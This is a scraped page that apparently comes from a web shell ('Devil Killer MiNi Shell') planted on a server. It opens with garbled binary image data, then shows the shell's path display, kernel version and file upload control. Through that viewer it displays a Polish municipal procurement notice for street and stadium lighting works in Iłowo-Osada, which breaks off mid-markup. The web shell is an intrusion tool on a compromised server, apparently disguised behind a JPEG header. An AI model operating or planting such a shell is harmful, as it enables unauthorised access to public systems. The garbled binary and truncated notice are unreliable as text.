JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250117/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250117/0004367801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa oświetlenia ulicznego w gminie Iłowo-Osada oraz wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA IŁOWO-OSADA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GMINA IŁOWO-OSADA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378120</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wyzwolenia 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iłowo-Osada</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">13-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">236541014</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugilowo-osada.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.ilowo-osada.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa oświetlenia ulicznego w gminie Iłowo-Osada oraz wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-61116b4a-76e3-40c8-8fd4-13dbbb8a5159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00043678</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00003773/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Rozbudowa oświetlenia ulicznego w gminie Iłowo-Osada oraz wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-61116b4a-76e3-40c8-8fd4-13dbbb8a5159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się elektronicznie przy użyciu portalu e- Zamówienia https://ezamowienia.gov.pl/pl/ oraz poczty elektronicznej e-mail: sekretariat@ugilowo-osada.pl z zastrzeżeniem, że złożenie oferty wraz z załącznikami następuje wyłącznie przy użyciu dedykowanego Formularza do złożenia, zmiany, wycofania oferty na platformie e-Zamówienia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane<br/>zostały w Regulaminie korzystania z portalu e-Zamówienia. https://ezamowienia.gov.pl/pl/integracja/<br/>2. Wykonawca zainteresowany złożeniem oferty w niniejszym postępowaniu o udzielenie zamówienia publicznego winien zapoznać się z aktualnymi wytycznymi technicznymi zawartymi w ww. regulaminach.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>4. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, przedmiotowe środki dowodowe (jeżeli dotyczy), podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, pełnomocnictwo lub inne dokumenty niezbędne do przeprowadzenia postępowania<br/>o udzielenie zamówienia publicznego, sporządza się w języku polskim w postaci elektronicznej w formatach danych: .pdf, .doc, .docx, .rtf, .odt i przekazuje przy użyciu środków komunikacji elektronicznej określonych dla danych dokumentów w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1)	Administratorem Pani/Pana danych osobowych jest: Gmina Iłowo-Osada, ul. Wyzwolenia 5, 13-240 Iłowo-Osada,<br/>2)	Inspektorem ochrony danych osobowych w Gminie Iłowo-Osada jest Michał Cupiał, info@edpo.pl*;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego znak sprawy: RI.271.2.2025.PN, którego przedmiotem jest: ,,Rozbudowa oświetlenia ulicznego w gminie Iłowo-Osada oraz wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada”<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz.U. z 2024 r., poz. 1320 ze zm.), dalej „ustawa Pzp”;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Posiada Pani/Pan:<br/>1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>3.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	Nie przysługuje Pani/Panu:<br/>1.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Ri.271.2.2025.PN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1. Wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada.<br/>1)	Przedmiotowy zakres robót obejmuje prace związane z wykonaniem oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada – w ramach zadania pn.: „Rozbudowa oświetlenia ulicznego w gminie Iłowo-Osada oraz wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada”. Inwestycja zlokalizowana: ul. Akacyjna, działka oznaczona numerem: 1037/8; obręb ewid: 0004 Iłowo-Osada, pow. działdowski. Roboty realizowane na podstawie Zgłoszenia robót budowlanych na ww. zadanie realizowane w formie ryczałtowej w zakresie: <br/>•	Wykonanie zasilania oświetlenia:<br/>- Ręczne kopanie rowów dla kabli, szerokość dna do 0.4 m, kategoria gruntu III, głębokość rowu do 0.8 m - 350 m;<br/>- Nasypanie warstwy piasku na dnie rowu kablowego, szerokość do 0,4 m – 350 m;<br/>- Układanie płaskownika FeZn, w rowach kablowych, przekrój bednarki do 120 mm2 – 350 m;<br/>- Układanie rur ochronnych z DVK w wykopie (rura do Fi75 mm R = 0,955 M = 1,000 S = 1,000) – 1 m;<br/>- Układanie rur ochronnych z PCW w wykopie (rura do Fi50 mm R = 0,955 M = 1,000 S = 1,000) – 350 m;<br/>- Układanie kabli w rurach, pustakach lub kanałach zamkniętych (kabel do 1,0˙kg/m Kabel YAKXs 0,6/1kV 4x25mm2 SE) – 400 m;<br/>- Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych (kabel 4-żyłowy, do 50 mm2) – 6 szt;<br/>- Ręczne zasypywanie rowów do kabli, szerokość dna wykopu do 0.4˙m, kategoria gruntu III, głębokość rowu do 0.8 m – 350 m;<br/>- Skrzynki i rozdzielnie skrzynkowe wraz z konstrukcja i płyta montażowa, mocowanie przez przykręcenie z wyposażeniem wg. projektu, masa do 20 kg – 1 kpl;<br/>- Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, uziemienie ochronne lub robocze, pomiar pierwszy – 1 szt;<br/>- Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, uziemienie ochronne lub robocze, pomiar każdy następny - 6 szt;<br/>•	Montaż słupów i opraw<br/>- Montaż i stawianie (Maszt MAL 14 z W550x95 anodowany inox andodowany, gafitowy, zabezpieczony elastomerem poliuretanowym) - 6 szt;<br/>- Montaż wysięgnika (aluminiowy WM1-0,8 160x80x5 ZP wzm anodowany inox) - 6 szt;<br/>- Montaż przewodów do opraw oświetleniowych, wciąganych w słupy, rury osłonowe i wysięgniki, wysokość latarń do 12˙m, przewody kabelkowe - 56 kpl;<br/>- Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych (kabel 3-żyłowy, do 16 mm2) - 6 szt;<br/>- Montaż opraw oświetlenia zewnętrznego (oprawa BCGT-740 EDTDD IPW D IKW z zasilaczem BG mounting accessory według PT) - 6 szt;<br/>- Uziomy ze stali profilowanej miedziowane (metoda wykonania udarowa), grunt kategorii III, uziom 3˙m, z agregatem prądotwórczym - 3 kpl;<br/>- Obsługa geodezyjna tyczenie, inwentaryzacja - 1 kpl.<br/>Przedmiot zamówienia w zakresie szczegółowym określa dokumentacja projektowa do zgłoszenia budowy tj. Załącznik nr 10 część 1 SWZ: kosztorys ślepy/ofertowy, przedmiar robót, projekt budowlany, szczegółowa specyfikacja techniczna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami w rozdziale 16 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2. Rozbudowa oświetlenia ulicznego drogi gminnej Nr 188063N w m. Białuty.<br/>1) Przedmiotowy zakres robót obejmuje prace związane z wykonaniem oświetlenia ulicznego drogi gminnej Nr 188063N w m. Białuty – w ramach zadania pn.: „Rozbudowa oświetlenia ulicznego w gminie Iłowo-Osada oraz wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada”. Inwestycja zlokalizowana: Białuty, działka oznaczona numerem 198, obręb ewid. 0001 Białuty, pow. działdowski. Roboty realizowane na podstawie Zgłoszenia robót budowlanych na ww. zadanie realizowane w formie ryczałtowej w zakresie:<br/>•	Zasilenie projektowanej linii nn kablowej oświetlenia ulicznego wraz z układem pomiarowym<br/>- Ręczne kopanie rowów dla kabli, szerokość dna do 0.4˙m, kategoria gruntu III, głębokość rowu do 1.0 m - 122 m;<br/>- Nasypanie warstwy piasku na dnie rowu kablowego, szerokość do 0,4 m - 122 m;<br/>- Wykopy pionowe ręczne dla urządzenia przyciskowego wraz z jego zasypaniem, grunt nienawodniony, kategorii I-II - 1 m3;<br/>- Przewierty mechaniczne dla rur pod obiektami (rura do Fi 100 mm) - 12 m;<br/>- Układanie bednarki w rowach kablowych(przekrój bednarki do 120 mm2) - 140 m;<br/>- Ułożenie rur osłonowych DVK 75mm - 12 m;<br/>- Układanie kabli w rurach, pustakach lub kanałach zamkniętych (kabel l YAKXs 0,6/1kV 4x25mm2 SE) - 142 m;<br/>- Obróbka na sucho kabli na napiecie do 1kV o izolacji i powłoce z tworzyw sztucznych (kabel 5-żyłowy, do 50˙mm2) - 2 szt;<br/>- Zasypanie rowów dla kabli ręcznie, grunt kategorii III - 122 m3;<br/>- Urządzenia rozdzielcze (zestaw szafka SOU-2/W/F) na fundamentach, masa do 20 kg, na fundamencie prefabrykowanym - 1 kpl;<br/>- Aparaty elektryczne (astronomiczny zegar= stycznik), masa do 2,5 kg - 2 szt;<br/>•	Linia oświetlenia drogi gminnej nr 188063 w m. Białuty<br/>- Ręczne kopanie rowów dla kabli, szerokość dna do 0.4˙m, kategoria gruntu III, głębokość rowu do 1.0 m - 133 m;<br/>- Nasypanie warstwy piasku na dnie rowu kablowego, szerokość do 0,4 m - 133 m;<br/>- Układanie płaskownika FeZn, w rowach kablowych, przekrój bednarki do 120 mm2 - 133 m;<br/>- Układanie rur ochronnych z DVK w wykopie, rura do Fi 75 mm (R = 0,955 M = 1,000 S = 1,000) - 24 m;<br/>- Układanie rur ochronnych z PCW w wykopie, rura do Fi 50 mm (R = 0,955 M = 1,000 S = 1,000) - 109 m;<br/>- Układanie kabli w rurach, pustakach lub kanałach zamkniętych (kabel do 1,0˙kg/m Kabel YAKXs 0,6/1kV 4x25mm2 SE) - 169 m;<br/>- Wykopy pionowe ręczne dla urządzenia przyciskowego wraz z jego zasypaniem, grunt nienawodniony, kategorii I-II - 1 m3;<br/>- Przewierty mechaniczne dla rur pod obiektami, rura do Fi 100 mm (pierwsza w wiązce) - 12 m;<br/>- Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych (kabel 4-żyłowy, do 50 mm2) - 16 szt;<br/>- Ręczne zasypywanie rowów do kabli, szerokość dna wykopu do 0.4˙m, kategoria gruntu III, głębokość rowu do 0.8 m - 133 m;<br/>- Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, uziemienie ochronne lub robocze, pomiar pierwszy - 1 szt;<br/>- Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, uziemienie ochronne lub robocze, pomiar każdy następny - 6 szt;<br/>•	Montaż słupów i opraw<br/>- Montaż i stawianie słupów oświetleniowych, słup do 100˙kg (Słup aluminiowy SAL-60 andodowany, grafitowy, zabezpieczony elastomerem poliuretanowym) - 6 szt;<br/>- Montaż wysięgnika aluminiowego na słupie WR-8A/1/0,6/5 anodowany inox - 6 szt;<br/>- Montaż przewodów do opraw oświetleniowych, wciąganych w słupy, rury osłonowe i wysięgniki, wysokość latarń do 10 m, przewody kabelkowe - 60 kpl;<br/>- Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych (kabel 3 żyłowy, do 16 mm2) - 12 szt;<br/>- Montaż opraw oświetlenia zewnętrznego, na wysięgniku LED według PT - 6 szt;<br/>- Uziomy ze stali profilowanej miedziowane (metoda wykonania udarowa), grunt kategorii III, uziom 3 m, z agregatem prądotwórczym - 3 kpl;<br/>- Obsługa geodezyjna tyczenie, inwentaryzacja - 1 kpl.<br/>Przedmiot zamówienia w zakresie szczegółowym określa dokumentacja projektowa do zgłoszenia budowy tj. Załącznik nr 10 część 2 SWZ: kosztorys ślepy/ofertowy, przedmiar robót, projekt budowlany, szczegółowa specyfikacja techniczna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami w rozdziale 16 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 